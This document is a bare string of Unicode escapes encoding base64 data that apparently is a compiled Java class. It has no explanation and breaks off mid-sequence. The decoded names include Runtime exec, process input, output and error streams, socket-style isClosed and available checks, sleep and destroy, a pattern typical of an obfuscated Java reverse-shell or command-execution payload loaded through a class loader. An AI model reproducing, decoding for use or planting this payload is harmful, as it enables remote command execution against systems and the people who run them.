\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0078\u0076\u0059\u0057\u0052\u006c\u0063\u0067\u0045\u0041\u0042\u006d\u0056\u0078\u0064\u0057\u0046\u0073\u0063\u0077\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0057\u0067\u0045\u0041\u0042\u0048\u0052\u0079\u0061\u0057\u0030\u0042\u0041\u0041\u0070\u007a\u0064\u0047\u0046\u0079\u0064\u0048\u004e\u0058\u0061\u0058\u0052\u006f\u0041\u0051\u0041\u0056\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u0046\u0063\u0033\u0042\u0073\u0061\u0058\u0051\u0042\u0041\u0043\u0063\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0068\u0077\u0059\u0058\u004a\u007a\u005a\u0055\u006c\u0075\u0064\u0041\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0053\u0051\u0045\u0041\u0046\u0079\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004a\u0031\u0062\u006d\u0035\u0068\u0059\u006d\u0078\u006c\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u0046\u0063\u0033\u0052\u0068\u0063\u006e\u0051\u0042\u0041\u0042\u0055\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0059\u0042\u0041\u0042\u0045\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0052\u006d\u006c\u0073\u005a\u
0054\u0073\u0070\u0056\u0067\u0045\u0041\u0042\u0053\u0068\u0062\u0051\u0069\u006c\u0057\u0041\u0051\u0041\u0046\u005a\u006d\u0078\u0031\u0063\u0032\u0067\u0042\u0041\u0041\u0056\u006a\u0062\u0047\u0039\u007a\u005a\u0051\u0045\u0041\u0043\u0048\u0052\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0051\u0057\u004a\u007a\u0062\u0032\u0078\u0031\u0064\u0047\u0056\u0051\u0059\u0058\u0052\u006f\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0077\u0062\u0047\u0046\u006a\u005a\u0051\u0045\u0041\u0052\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0035\u0063\u0033\u0052\u006c\u0062\u0051\u0045\u0041\u0043\u0032\u0064\u006c\u0064\u0046\u0042\u0079\u0062\u0033\u0042\u006c\u0063\u006e\u0052\u0035\u0041\u0051\u0041\u004c\u0064\u0047\u0039\u004d\u0062\u0033\u0064\u006c\u0063\u006b\u004e\u0068\u0063\u0032\u0055\u0042\u0041\u0041\u005a\u0068\u0063\u0048\u0042\u006c\u0062\u006d\u0051\u0042\u0041\u0043\u0030\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u006a\u0073\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u00
78\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0046\u004a\u0031\u0062\u006e\u0052\u0070\u0062\u0057\u0055\u0042\u0041\u0042\u0055\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0054\u0073\u0042\u0041\u0043\u0067\u006f\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0042\u0041\u0041\u0035\u006e\u005a\u0058\u0052\u004a\u0062\u006e\u0042\u0031\u0064\u0046\u004e\u0030\u0063\u006d\u0056\u0068\u0062\u0051\u0045\u0041\u0046\u0079\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0053\u0057\u0035\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0059\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u004d\u0064\u0058\u004e\u006c\u0052\u0047\u0056\u0073\u0061\u0057\u0031\u0070\u0064\u0047\u0056\u0079\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0031\u004e\u006a\u0059\u0057\u0035\u0075\u005a\u0058\u0049\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0052\u0058\u004a\u0079\u0062\u0033\u004a\u0054
\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0042\u0041\u0041\u0064\u006b\u005a\u0058\u004e\u0030\u0063\u006d\u0039\u0035\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0059\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0049\u0061\u0058\u004e\u0044\u0062\u0047\u0039\u007a\u005a\u0057\u0051\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u004a\u0059\u0058\u005a\u0068\u0061\u0057\u0078\u0068\u0059\u006d\u0078\u006c\u0041\u0051\u0041\u0044\u004b\u0043\u006c\u004a\u0041\u0051\u0041\u0045\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0045\u004b\u0045\u006b\u0070\u0056\u0067\u0045\u0041\u0042\u0058\u004e\u0073\u005a\u0057\u0056\u0077\u0041\u0051\u0041\u0045\u004b\u0045\u006f\u0070\u0056\u0067\u0045\u0041\u0043\u0057\u0056\u0034\u0061\u0058\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0031\u006c\u0063\u0033\u004e\u0068\u005a\u0032\u0055\u0042\u0041\u0041\u0068\u0070\u0062\u006e\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0041\u0068\u0041\u0049\u0077\u0041\u0048\u0067\u0041\u0042\u0041\u
0041\u0038\u0041\u0041\u0067\u0041\u0043\u0041\u0049\u0030\u0041\u006a\u0067\u0041\u0041\u0041\u0041\u0049\u0041\u006a\u0077\u0043\u0051\u0041\u0041\u0041\u0041\u0043\u0051\u0041\u0042\u0041\u004a\u0045\u0041\u006b\u0067\u0041\u0043\u0041\u004a\u004d\u0041\u0041\u0041\u004f\u0032\u0041\u0041\u0059\u0041\u0045\u0077\u0041\u0041\u0041\u006f\u0034\u0071\u0074\u0077\u0041\u0042\u0075\u0041\u0041\u0043\u0074\u0067\u0041\u0044\u0054\u0043\u0075\u0032\u0041\u0041\u0051\u0053\u0042\u0062\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u0072\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u004a\u0077\u0041\u0041\u004a\u0054\u0069\u0030\u0036\u0042\u0042\u006b\u0045\u0076\u006a\u0059\u0046\u0041\u007a\u0059\u0047\u0046\u0051\u0059\u0056\u0042\u0061\u0049\u0043\u0057\u0042\u006b\u0045\u0046\u0051\u0059\u0079\u004f\u0067\u0063\u005a\u0042\u0038\u0063\u0041\u0042\u0071\u0063\u0043\u0051\u0078\u006b\u0048\u0074\u0067\u0041\u004b\u004f\u0067\u0067\u005a\u0043\u0042\u0049\u004c\u0074\u0067\u0041\u004d\u006d\u0067\u0041\u004e\u0047\u0051\u0067\u0053\u0044\u0062\u0059\u0041\u0044\u004a\u006f\u0041\u0042\u0071\u0063\u0043\u004a\u0052\u006b\u0048\u0074\u0067\u0041\u0045\u0045\u0067\u0036\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u0065\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0077\u0051\u0041\u0050\u006d\u0067\u0041\u0047\u0070\u0077\u0049\u0043\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u004c\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0043\u0062\u0059\u0041\u0043\u0044\u006f\u004a\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u0062\u0059\u0041\u0042\u006b\u0032\u006e\u0041\u0042\u0059\u0036\u0043\u0068\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0074\u0067\u0041\u0054\u0045\u0068\u0047\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u006d\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u00
6b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0045\u0068\u0053\u0032\u0041\u0041\u005a\u004e\u0070\u0077\u0041\u0051\u004f\u0067\u006f\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0055\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u004f\u0067\u006b\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0056\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u0057\u0077\u0041\u0041\u0057\u004f\u0067\u006f\u005a\u0043\u0072\u006b\u0041\u0046\u0077\u0045\u0041\u004f\u0067\u0073\u005a\u0043\u0037\u006b\u0041\u0047\u0041\u0045\u0041\u006d\u0051\u0046\u0062\u0047\u0051\u0075\u0035\u0041\u0042\u006b\u0042\u0041\u0044\u006f\u004d\u0047\u0051\u0079\u0032\u0041\u0041\u0051\u0053\u0047\u0072\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0044\u004c\u0059\u0041\u0043\u0044\u006f\u004e\u0047\u0051\u0032\u0032\u0041\u0041\u0051\u0053\u0047\u0077\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u004f\u0039\u0041\u0042\u0036\u0032\u0041\u0042\u0038\u0036\u0044\u0068\u006b\u004e\u0074\u0067\u0041\u0045\u0045\u0069\u0041\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u0049\u0069\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u0049\u0054\u006f\u0050\u0047\u0051\u002f\u0048\u0041\u0041\u0061\u006e\u002f\u0035\u0045\u0071\u0047\u0051\u002b\u0032\u0041\u0043\u004f\u0032\u0041\u0043\u0051\u0036\u0045\u0042\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0055\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004f\u0079\u0041\u0043\u005a\u0054\u0074\u0067\u0041\u0064\u0047\u0051\u0034\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0052\u0041\u004d\u0069\u0034\u0041\u0043\u0064\u0054\u0074\u0067\u0041\u0066\u0056\u0079\u006f\u0053\u004b\u004c\u0059\u0041
\u004b\u0054\u006f\u0052\u0047\u0052\u0047\u0032\u0041\u0043\u006f\u0036\u0043\u0052\u006b\u0052\u0045\u0069\u0073\u0047\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u004c\u0046\u004e\u005a\u0042\u004c\u0049\u0041\u004a\u006c\u004e\u005a\u0042\u0062\u0049\u0041\u004a\u006c\u004f\u0032\u0041\u0043\u0030\u005a\u0043\u0051\u0061\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u0051\u0055\u0031\u006b\u0045\u0041\u0037\u0067\u0041\u004a\u0031\u004e\u005a\u0042\u0052\u006b\u0051\u0076\u0072\u0067\u0041\u004a\u0031\u004f\u0032\u0041\u0042\u0039\u0058\u0047\u0051\u0036\u0032\u0041\u0041\u0051\u0053\u004c\u0067\u0053\u0039\u0041\u0042\u0078\u005a\u0041\u0078\u006b\u0052\u0055\u0037\u0059\u0041\u0048\u0052\u006b\u004f\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u0047\u0051\u006c\u0054\u0074\u0067\u0041\u0066\u0056\u0036\u0063\u0041\u0054\u007a\u006f\u0052\u004b\u0068\u0049\u0077\u0074\u0067\u0041\u0070\u004f\u0068\u0049\u005a\u0045\u0068\u0049\u0078\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0078\u0054\u0074\u0067\u0041\u0074\u0047\u0052\u0049\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u005a\u0045\u0046\u004f\u0032\u0041\u0042\u0038\u0036\u0043\u0052\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0034\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u005a\u0045\u006c\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u004a\u0055\u0037\u0059\u0041\u0048\u0031\u0065\u006e\u0041\u0041\u0036\u006e\u0041\u0041\u0055\u0036\u0043\u0049\u0051\u0047\u0041\u0061\u0066\u0039\u0070\u0037\u0045\u0041\u0042\u0077\u0043\u0067\u0041\u004b\u0073\u0041\u0072\u0067\u0041\u0053\u0041\u004d\u0034\u0041\u0033\u0041\u0044\u0066\u0041\u0042\u0049\u0042\u0078\u0041\u0049\u0077\u0041\u006a\u004d\u0041\u004c\u0077\u0041\u002f\u0041\u0045\u0051\u0043\u0068\u0051\u0041\u0076\u0041\u0045\u0063\u0041\u0059\u0067\u004b\u0046\u0041\u0043\u0038\u0041\u005a\u0051\u0043\u0046\u0041\u006f\u0055\u0041\u004c\u0077\u0043\u0049\u0041\u
006e\u0038\u0043\u0068\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u004e\u0034\u0041\u004e\u0077\u0041\u0041\u0041\u0042\u0055\u0041\u0042\u0041\u0041\u0057\u0041\u0041\u0073\u0041\u0046\u0077\u0041\u0056\u0041\u0042\u0067\u0041\u0047\u0067\u0041\u005a\u0041\u0043\u0059\u0041\u0047\u0077\u0041\u002f\u0041\u0042\u0030\u0041\u0052\u0077\u0041\u0065\u0041\u0045\u0034\u0041\u0048\u0077\u0042\u006c\u0041\u0043\u0041\u0041\u0063\u0041\u0041\u0068\u0041\u0048\u0055\u0041\u0049\u0067\u0042\u0039\u0041\u0043\u004d\u0041\u0069\u0041\u0041\u006b\u0041\u004a\u004d\u0041\u004a\u0051\u0043\u0059\u0041\u0043\u0059\u0041\u006f\u0041\u0041\u006f\u0041\u004b\u0073\u0041\u004b\u0077\u0043\u0075\u0041\u0043\u006b\u0041\u0073\u0041\u0041\u0071\u0041\u004d\u0045\u0041\u004c\u0041\u0044\u0047\u0041\u0043\u0030\u0041\u007a\u0067\u0041\u0076\u0041\u004e\u0077\u0041\u004d\u0067\u0044\u0066\u0041\u0044\u0041\u0041\u0034\u0051\u0041\u0078\u0041\u004f\u0077\u0041\u004d\u0077\u0044\u0078\u0041\u0044\u0051\u0041\u002b\u0051\u0041\u0031\u0041\u0051\u0051\u0041\u004e\u0067\u0045\u004a\u0041\u0044\u0063\u0042\u0046\u0077\u0041\u0034\u0041\u0054\u004d\u0041\u004f\u0051\u0045\u002b\u0041\u0044\u006f\u0042\u0051\u0077\u0041\u0037\u0041\u0055\u0073\u0041\u0050\u0041\u0046\u006b\u0041\u0044\u0030\u0042\u0069\u0067\u0041\u002b\u0041\u0059\u0038\u0041\u0050\u0077\u0047\u0053\u0041\u0045\u0045\u0042\u006e\u0051\u0042\u0043\u0041\u0063\u0051\u0041\u0052\u0041\u0048\u004d\u0041\u0045\u0055\u0042\u0030\u0077\u0042\u0047\u0041\u0067\u0034\u0041\u0052\u0077\u0049\u0077\u0041\u0045\u0077\u0043\u004d\u0077\u0042\u0049\u0041\u006a\u0055\u0041\u0053\u0051\u0049\u0039\u0041\u0045\u006f\u0043\u0058\u0051\u0042\u004c\u0041\u006e\u0038\u0041\u0054\u0051\u004b\u0043\u0041\u0046\u0045\u0043\u0068\u0051\u0042\u0050\u0041\u006f\u0063\u0041\u0047\u0077\u004b\u004e\u0041\u0046\u004d\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0067\u00
43\u0058\u0041\u0041\u004d\u0041\u006b\u0077\u0041\u0041\u0041\u0044\u006b\u0041\u0041\u0067\u0041\u0044\u0041\u0041\u0041\u0041\u0045\u0053\u0075\u0034\u0041\u0044\u004b\u0077\u0054\u0062\u0067\u0041\u0041\u0072\u0059\u0041\u004e\u0043\u0075\u0032\u0041\u0044\u0057\u0077\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0045\u0041\u0041\u0055\u0041\u004d\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0041\u004f\u0041\u0041\u004d\u0041\u0041\u0041\u0042\u0064\u0041\u0041\u0055\u0041\u0058\u0067\u0041\u0047\u0041\u0046\u0038\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u007a\u0041\u004a\u0067\u0041\u0041\u0041\u0041\u0043\u0041\u004a\u006b\u0041\u0041\u0051\u0043\u0061\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u002f\u0077\u0041\u0045\u0041\u0041\u0051\u0041\u0041\u0041\u0043\u0062\u004b\u0038\u0059\u0041\u0044\u0042\u0049\u0032\u004b\u0037\u0059\u0041\u004e\u0035\u006b\u0041\u0042\u0068\u0049\u0034\u0073\u0043\u0075\u0032\u0041\u0044\u006c\u004d\u004b\u0078\u0049\u0036\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u0037\u004b\u0069\u0075\u0033\u0041\u0044\u0077\u0053\u0050\u0062\u0059\u0041\u0050\u006b\u0030\u0073\u0076\u0067\u0057\u0066\u0041\u0041\u0059\u0053\u0050\u0037\u0041\u0071\u004c\u0041\u004d\u0079\u0074\u0051\u0042\u0041\u004b\u0069\u0077\u0045\u004d\u0072\u0067\u0041\u0051\u0062\u0067\u0041\u004a\u0037\u0055\u0041\u0051\u0072\u0073\u0041\u0051\u0031\u006b\u0071\u0074\u0077\u0042\u0045\u0054\u0069\u0032\u0032\u0041\u0045\u0055\u0053\u0052\u0072\u0041\u0072\u0045\u006b\u0065\u0032\u0041\u0044\u0075\u005a\u0041\u0043\u0049\u0071\u004b\u0037\u0063\u0041\u0050\u0042\u0049\u0039\u0074\u0067\u0041\u002b\u0054\u0053\u0079\u002b\u0042\u005a\u0038\u0041\u0042\u0068\u004a\u0049\u0073\u0043\u006f\u0073\u0041\u007a\u0049\u0073\u0042\u0044\u004b\u0032\u0041\u0045\u006d\u0077\u004b\u0078\u004a\u004b\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u004e\u004b\u0069\u006f\u0072\u0074\u0077\u0041\u0038\u0074\u0067\u0042\u004c
\u0073\u0043\u006f\u0071\u004b\u0037\u0063\u0041\u0050\u004c\u0059\u0041\u0053\u0037\u0041\u0041\u0041\u0041\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0053\u0041\u0042\u0051\u0041\u0041\u0041\u0042\u0070\u0041\u0041\u0030\u0041\u0061\u0067\u0041\u0051\u0041\u0047\u0077\u0041\u0046\u0051\u0042\u0074\u0041\u0042\u0034\u0041\u0062\u0077\u0041\u0070\u0041\u0048\u0041\u0041\u004c\u0077\u0042\u0078\u0041\u0044\u0049\u0041\u0063\u0077\u0041\u0035\u0041\u0048\u0051\u0041\u0052\u0067\u0042\u0031\u0041\u0045\u0038\u0041\u0064\u0067\u0042\u0054\u0041\u0048\u0063\u0041\u0056\u0067\u0042\u0034\u0041\u0046\u0038\u0041\u0065\u0051\u0042\u0071\u0041\u0048\u006f\u0041\u0063\u0041\u0042\u0037\u0041\u0048\u004d\u0041\u0066\u0051\u0042\u002b\u0041\u0048\u0034\u0041\u0068\u0077\u0042\u002f\u0041\u004a\u0045\u0041\u0067\u0051\u0041\u0042\u0041\u004a\u0077\u0041\u006e\u0051\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0042\u0032\u0041\u0041\u004d\u0041\u0042\u0051\u0041\u0041\u0041\u0044\u0061\u0037\u0041\u0045\u0078\u005a\u004b\u0037\u0063\u0041\u0054\u0055\u0036\u0037\u0041\u0045\u0035\u005a\u004c\u0062\u0063\u0041\u0054\u007a\u006f\u0045\u0047\u0051\u0051\u0073\u0075\u0041\u0042\u0051\u0074\u0067\u0042\u0052\u0047\u0051\u0053\u0032\u0041\u0046\u0049\u005a\u0042\u004c\u0059\u0041\u0055\u0036\u0063\u0041\u0043\u007a\u006f\u0045\u0047\u0051\u0053\u0032\u0041\u0046\u0053\u0077\u004c\u0062\u0059\u0041\u0056\u0062\u0041\u0041\u0041\u0051\u0041\u004a\u0041\u0043\u0059\u0041\u004b\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0043\u0059\u0041\u0043\u0051\u0041\u0041\u0041\u0049\u0077\u0041\u0043\u0051\u0043\u004f\u0041\u0042\u004d\u0041\u006a\u0077\u0041\u0063\u0041\u004a\u0041\u0041\u0049\u0051\u0043\u0052\u0041\u0043\u0059\u0041\u006c\u0041\u0041\u0070\u0041\u004a\u0049\u0041\u004b\u0077\u0043\u0054\u0041\u0044\u0045\u0041\u006c\u0051\u0041\u0043\u0041\u004a\u0034\u0041\u006d\u0077\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0041\u0076\u0041\u
0041\u004d\u0041\u0041\u0067\u0041\u0041\u0041\u0042\u0063\u0072\u0045\u006a\u006f\u0053\u004e\u0072\u0059\u0041\u0056\u0068\u004a\u004b\u0045\u006a\u0061\u0032\u0041\u0046\u0059\u0053\u0052\u0078\u0049\u0032\u0074\u0067\u0042\u0057\u0073\u0041\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u0059\u0041\u0041\u0051\u0041\u0041\u0041\u004a\u0034\u0041\u0041\u0051\u0043\u0066\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0042\u0078\u0077\u0041\u0045\u0041\u0041\u006b\u0041\u0041\u0041\u0045\u006e\u0045\u006c\u0065\u0034\u0041\u0046\u0069\u0032\u0041\u0046\u006c\u004e\u004b\u0037\u0059\u0041\u004f\u0055\u0077\u0042\u0054\u0069\u0077\u0053\u0057\u0072\u0059\u0041\u0044\u004a\u006b\u0041\u0051\u0043\u0073\u0053\u0057\u0037\u0059\u0041\u0044\u004a\u006b\u0041\u0049\u0043\u0073\u0053\u0058\u004c\u0059\u0041\u0044\u004a\u006f\u0041\u0046\u0037\u0073\u0041\u0058\u0056\u006d\u0033\u0041\u0046\u0034\u0072\u0074\u0067\u0042\u0066\u0045\u006d\u0043\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0046\u004d\u0042\u0072\u0030\u0041\u0049\u0056\u006b\u0044\u0045\u0069\u004a\u0054\u0057\u0051\u0051\u0053\u0059\u006c\u004e\u005a\u0042\u0053\u0074\u0054\u004f\u0067\u0053\u006e\u0041\u0044\u0030\u0072\u0045\u006c\u0075\u0032\u0041\u0041\u0079\u005a\u0041\u0043\u0041\u0072\u0045\u006c\u0079\u0032\u0041\u0041\u0079\u0061\u0041\u0042\u0065\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u004b\u0037\u0059\u0041\u0058\u0078\u004a\u006a\u0074\u0067\u0042\u0066\u0074\u0067\u0042\u0068\u0054\u0041\u0061\u0039\u0041\u0043\u0046\u005a\u0041\u0078\u004a\u006b\u0055\u0031\u006b\u0045\u0045\u006d\u0056\u0054\u0057\u0051\u0055\u0072\u0055\u007a\u006f\u0045\u0075\u0041\u0042\u006d\u0047\u0051\u0053\u0032\u0041\u0047\u0064\u004f\u0075\u0077\u0042\u006f\u0057\u0053\u0032\u0032\u0041\u0047\u006d\u0033\u0041\u0047\u006f\u0053\u0061\u0037\u0059\u0041\u0062\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0047\u0032\u005a\u0041\u0041\u0073\u005a\u0042\u0062\u00
